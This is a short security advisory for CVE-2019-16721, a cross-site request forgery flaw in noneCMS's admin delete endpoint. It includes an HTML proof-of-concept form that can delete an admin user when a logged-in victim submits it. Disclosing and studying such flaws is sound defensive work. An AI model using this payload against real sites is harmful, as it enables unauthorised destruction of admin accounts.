Cross-site request forgery in noneCMS - CVE-2019-16721
Published: September 24, 2019
noneCMS
Detailed vulnerability description
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists due to insufficient validation of the HTTP request origin in the "public/index.php/admin/admin/dele.html". A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website, such as deleting the admin user.
PoC:
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://[host]/public/index.php/admin/admin/dele.html">
<input type="hidden" name="id" value="10" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>